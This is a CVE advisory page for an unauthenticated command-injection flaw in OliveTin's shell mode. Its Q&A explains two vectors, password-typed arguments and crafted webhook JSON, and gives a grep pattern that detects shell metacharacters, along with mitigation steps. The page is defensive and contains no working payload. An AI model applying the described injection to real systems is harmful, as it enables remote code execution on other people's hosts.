CVE-2026-27626
Unauthenticated Remote Code Execution in OliveTin Shell Mode
Publication date: 2026-02-25
Last updated on: 2026-02-27
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| olivetin | olivetin | to 3000.10.0 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
[{'type': 'paragraph', 'content': "CVE-2026-27626 is a critical OS Command Injection vulnerability in OliveTin versions up to 3000.10.0. OliveTin provides access to predefined shell commands via a web interface. The vulnerability arises because the shell mode safety check blocks many dangerous argument types but excludes the 'password' type, allowing users to inject shell metacharacters and execute arbitrary OS commands."}, {'type': 'paragraph', 'content': "There are two independent attack vectors: Vector 1 allows any authenticated user to supply a malicious 'password' argument containing shell metacharacters that get executed by the shell. Vector 2 allows unauthenticated attackers to send specially crafted JSON payloads to webhook endpoints, bypassing type safety checks and enabling remote code execution (RCE). When combined, these vectors allow unauthenticated RCE on OliveTin instances using Shell mode with webhook-triggered actions."}] [1]
How can this vulnerability impact me? :
This vulnerability allows attackers to execute arbitrary operating system commands on the OliveTin host with the permissions of the OliveTin process.
- Authenticated users can exploit Vector 1 to run arbitrary commands by injecting malicious input in password-typed arguments.
- Unauthenticated attackers can exploit Vector 2 by sending malicious JSON payloads to webhook endpoints, leading to remote code execution without any authentication.
The combined effect is unauthenticated remote code execution, which can compromise the confidentiality, integrity, and availability of the affected system.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'Detection of this vulnerability involves monitoring for suspicious command executions and malformed inputs that include shell metacharacters in password arguments or webhook JSON payloads.'}, {'type': 'paragraph', 'content': 'For Vector 1 (authenticated user input), you can check OliveTin API logs for POST requests to /api/StartAction containing password arguments with shell metacharacters such as ;, |, `, or $().'}, {'type': 'paragraph', 'content': 'For Vector 2 (unauthenticated webhook), monitor incoming POST requests to webhook endpoints (e.g., /webhook/git-deploy) for JSON payloads containing suspicious values with shell metacharacters.'}, {'type': 'paragraph', 'content': 'Suggested commands to detect exploitation attempts include:'}, {'type': 'list_item', 'content': 'Use network monitoring tools (e.g., tcpdump, Wireshark) to capture HTTP POST requests to /api/StartAction and /webhook/* endpoints and inspect payloads for shell metacharacters.'}, {'type': 'list_item', 'content': 'Search OliveTin server logs for command executions containing suspicious shell metacharacters, for example using grep:'}, {'type': 'list_item', 'content': 'grep -E ";|\\||`|\\$\\(\\)" /path/to/olivetin/logs/*'}, {'type': 'list_item', 'content': 'Check running processes for unexpected shell commands spawned by OliveTin using:'}, {'type': 'list_item', 'content': 'ps aux | grep olivetin'}] [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access and disabling vulnerable features until a patch is available.
- Restrict or disable webhook endpoints that accept unauthenticated POST requests to prevent unauthenticated remote code execution.
- Disable or restrict Shell mode usage in OliveTin to prevent execution of arbitrary shell commands.
- Enforce authentication and authorization on all API endpoints, especially /api/StartAction and webhook endpoints.
- Monitor and audit OliveTin logs for suspicious command executions or unusual activity.
- Consider network-level controls such as firewall rules to limit access to OliveTin services.
As of the publication date, no patched version is available, so these mitigations are critical to reduce risk.